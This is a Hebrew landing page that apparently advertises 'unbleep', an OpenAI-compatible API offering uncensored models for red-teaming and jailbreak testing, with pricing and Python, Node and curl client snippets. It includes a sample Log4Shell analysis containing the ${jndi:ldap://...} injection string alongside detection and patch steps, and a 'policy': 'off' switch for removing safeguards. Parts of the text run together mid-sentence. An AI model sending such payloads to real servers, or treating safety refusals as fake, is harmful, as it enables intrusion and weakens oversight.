המודלים המיינסטרימיים עונים בצפצוף. אנחנו מסירים אותו.
API תואם OpenAI, בנוי למפתחים, למודלים ללא הגבלות — ל-red-teaming, להערכת jailbreak, למחקר בטיחות, ולכל מה שלא יכול להרשות לעצמו סירוב מזויף.
השמות מתארים מה הם עושים, לא את מודל המשקולות הפתוחות שמתחת — כך נוכל לשפר את המשקולות בלי לשבור לכם את הקוד אף פעם.
ברירת המחדל. חלון של 256K טוקנים, ללא צנזורה — סוס העבודה היומיומי ל-red-teaming, להערכות ולמחקר.
הדרגה המתקדמת ביותר. הקשר של 1M טוקנים למשימות הגדולות ביותר — בסיסי קוד שלמים, תמלילים ארוכים, ניתוח מעמיק של מסמכים מרובים.
האפשרות הזולה והמהירה. עלות נמוכה יותר לטוקן לתעבורה בנפח גבוה ולקריאות פשוטות יותר.
סשן red-team על Log4Shell — שורש הבעיה, בדיקה בטוחה במעבדה, והתיקון. בלי הרצאות, בלי סירובים; רק הניתוח.
CVE-2021-44228 (Log4Shell). שורש הבעיה, ואיך ה-lookup של JNDI הופך ל-RCE.${…} בתוך מחרוזות שהוא רושם ללוג. ערך שנרשם ללוג, כמו ${jndi:ldap://host/x}, גורם ל-JVM לפתור את השם הזה דרך LDAP/RMI, להביא מחלקת Java מרוחקת וליצור ממנה מופע — קוד שרירותי רץ בתוך תהליך הלוגינג. משטח ההפעלה הוא כל דבר שמגיע לקריאת לוג: User-Agent, כותרות, שדות טופס. הטווח הפגיע: 2.0-beta9 → 2.14.1.${jndi:ldap://<token>.your-collab/x} בכותרת שאתם יודעים שנרשמת ללוג.<token> פירושה שהמחרוזת עברה אינטרפולציה, כלומר השירות פגיע. שום דבר לא מוגש, ולכן שום דבר לא מורץ.JndiLookup.class ובדקו את הגרסאות מול הטווח הפגיע.2.17.1+. עדיין לא אפשרי? הגדירו log4j2.formatMsgNoLookups=true (2.10+) או הסירו את JndiLookup.class מה-classpath, הוסיפו כלל WAF עבור ${jndi:, וסננו ביציאה (egress) את תעבורת ה-LDAP/RMI היוצאת מהמארח.ה-API תואם OpenAI כהחלפה ישירה. שנו את כתובת הבסיס ואת המפתח — הקוד, ה-SDKs והכלים הקיימים שלכם ממשיכים לעבוד.
from openai import OpenAI
client = OpenAI(
base_url="https://unbleep.ai/v1", # ← the only change
api_key="ub_live_9f2c…",
)
stream = client.chat.completions.create(
model="unbleep",
messages=[{"role": "user", "content": "…"}],
stream=True,
)
for chunk in stream:
print(chunk.choices[0].delta.content or "", end="")
import OpenAI from "openai";
const client = new OpenAI({
baseURL: "https://unbleep.ai/v1", // ← the only change
apiKey: "ub_live_9f2c…",
});
const stream = await client.chat.completions.create({
model: "unbleep",
messages: [{ role: "user", content: "…" }],
stream: true,
});
for await (const chunk of stream)
process.stdout.write(chunk.choices[0].delta.content ?? "");
curl https://unbleep.ai/v1/chat/completions \
-H "Authorization: Bearer ub_live_9f2c…" \
-H "Content-Type: application/json" \
-d '{
"model": "unbleep",
"messages": [{"role":"user","content":"…"}],
"stream": true,
"policy": "off"
}'
OpenAI Python, Node, וכל כלי שמדבר את Chat Completions API. אין מה ללמוד מחדש.
text/event-stream של חתיכות delta, שמסתיים ב-[DONE] — בדיוק מה שהלקוח שלכם כבר מפרסר.
שלחו "policy": "research" כדי לתייג בקשה בהיסטוריית השימוש שלכם, או "strict" כדי לאכוף רשימת חסימה, כשפרויקט דורש זאת.
קנו קרדיט בכל פעם שאתם צריכים, או עברו למסלול חודשי ותנו לו להגיע מעצמו. כל בקשה מחויבת לפי הטוקנים שצרכה בפועל, לפי התעריף המפורסם למיליון טוקנים עבור המודל שקראתם לו.
unbleep $3.00 קלט / $3.00 פלט
unbleep-high $5.00 / $5.00
unbleep-mini $1.00 / $1.00
ל-1M טוקנים
הוסיפו קרדיט בכרטיס בכל פעם שאתם צריכים, או תנו למסלול לספק אותו בכל חודש. הוא לא פג כל עוד החשבון שלכם פתוח, וקרדיט שלא נוצל ניתן להחזר בתוך 14 יום.
אנחנו שומרים אומדן כשבקשה מתחילה ומסלקים לפי עלות הטוקנים האמיתית כשהיא מסתיימת. בקשה שנכשלה בשגיאה משוחררת, ולעולם לא מחויבת.
בקשה נדחית כשהיתרה שלכם לא מכסה אותה — אנחנו אף פעם לא נותנים אשראי ולא מחייבים בדיעבד. היתרה וצריכת הטוקנים מוצגות בקונסולה.
unbleep מיועד לצוותי אבטחה, לחוקרים ולבונים שצריכים קו בסיס לא מסונן. אפס שמירה כברירת מחדל, חוגת מדיניות ממדרגה ראשונה, היסטוריית שימוש ועלות לכל בקשה בקונסולה, ומדיניות שימוש מקובל אמיתית. ללא צנזורה זו יכולת — אתם מחליטים איך היא מנוהלת.